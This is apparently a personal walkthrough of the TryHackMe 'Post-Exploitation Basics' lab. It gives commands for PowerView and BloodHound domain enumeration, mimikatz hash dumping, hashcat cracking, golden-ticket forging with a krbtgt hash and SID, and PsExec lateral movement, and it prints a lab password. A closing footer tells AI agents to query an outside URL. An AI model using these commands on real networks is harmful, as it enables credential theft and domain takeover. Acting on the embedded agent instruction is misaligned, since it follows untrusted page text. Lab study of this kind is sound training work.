# Post-Exploitation Basics **Room Link:** ## Presteps for Lab ### SharpHound Installation SharpHound version on the box is too old for the current version of Bloodhound so I had to update it. **Kali** ``` git clone https://github.com/BloodHoundAD/BloodHound.git scp -r BloodHound/Collectors/SharpHound.ps1 Administrator@$VICTIM:C:/Users/Administrator/ Password: P@$$W0rd ``` Added this line to SharpHound.ps1 before transfering so I could run the command right away

**Victim** ``` powershell -ep bypass .\SharpHound.ps1 ``` ### BloodHound Installation ``` apt-get install bloodhound neo4j console ```

## Enumeration w/ Powerview **Kali** ``` ssh Administrator@$VICTIM Password: P@$$W0rd ``` **Victim** Run below to be able to run PowerView commands. ``` powershell -ep bypass . .\Downloads\PowerView.ps1 ``` Enumerate the domain users. ``` Get-NetUser | select cn ```

Enumerate the domain groups. ``` Get-NetGroup -GroupName *admin* ```

Find Shared folders. ``` Invoke-ShareFinder ```

Get Operating systems on the network. ``` Get-NetComputer -fulldata | select operatingsystem ```

## Enumeration w/ Bloodhound Setup and get loot with Bloodhound. **Victim** ``` powershell -ep bypass . .\Downloads\SharpHound.ps1 Invoke-Bloodhound -CollectionMethod All -Domain CONTROLLER.local -ZipFileName loot.zip ``` Transfer Bloodhound results back to Kali. SCP can be used in this case **Kali** ``` scp Administrator@$VICTIM:C:/Users/Administrator/20230212071833_loot.zip loot.zip Password: P@$$W0rd ``` ### Mapping the network w/ BloodHound ``` bloodhound --no-sandbox ``` We can just drag the zip file to bloodhound to import it.

Find all Domain Admins

List all Kerberostable accounts

## Dumping hashes w/ mimikatz **Kali** ``` ssh Administrator@$VICTIM Password: P@$$W0rd ``` **Victim** ``` cd Downloads && mimikatz.exe ``` **Victim - Mimikatz** ``` privilege::debug lsadump::lsa /patch ```

Copy to Kali output back to Kali ![](/files/CrUJEQBAnBLwFvq4lkc9) Output only the hashes and remove all duplicates into a new file. **Kali** ``` cat hashes.txt | grep NTLM | awk -F ":" '{print $2}' | grep "\S" | sed 's/^[ \t]*//' | sort | uniq > hash.txt ```

**Kali** ``` hashcat -m 1000 hash.txt /usr/share/wordlists/rockyou.txt hashcat -m 1000 hash.txt /usr/share/wordlists/rockyou.txt --show ```

## Golden Ticket Attacks w/ mimikatz **Kali** ``` ssh Administrator@$VICTIM Password: P@$$W0rd ``` ### Dump the krbtgt Hash **Victim** ``` cd downloads && mimikatz.exe ``` This dumps the hash and security identifier of the Kerberos Ticket Granting Ticket account allowing you to create a golden ticket. Take note of what is outlined in red you'll need it to create the golden ticket. **Victim - Mimikatz** ``` privilege::debug lsadump::lsa /inject /name:krbtgt ```

### Create a Golden Ticket **Victim - Mimikatz** ``` kerberos::golden /user:Administrator /domain:controller.local /sid:S-1-5-21-849420856-2351964222-986696166 /krbtgt:5508500012cc005cf7082a9a89ebdfdf /id:500 ```

### Use the Golden Ticket to access other machine This will open a new command prompt with elevated privileges to all machines.Access other Machines! - You will now have another command prompt with access to all other machines on the network. **Victim - Mimikatz** ``` misc::cmd ``` This doesn't actually work. Because of how tryhackme is setup but you would then be able to access other machines. In the example below you'd need to find out what other machines exists to pull this off. **Victim** ``` dir \\Desktop-1\c$ PsExec.exe \\Desktop-1 cmd.exe ```

## Enumeration w/ Server Manager **Kali** ``` rdesktop -d CONTROLLER -u Administrator $VICTIM Password: P@$$W0rd ``` Open Active Directory

--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/post-exploitation-basics.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.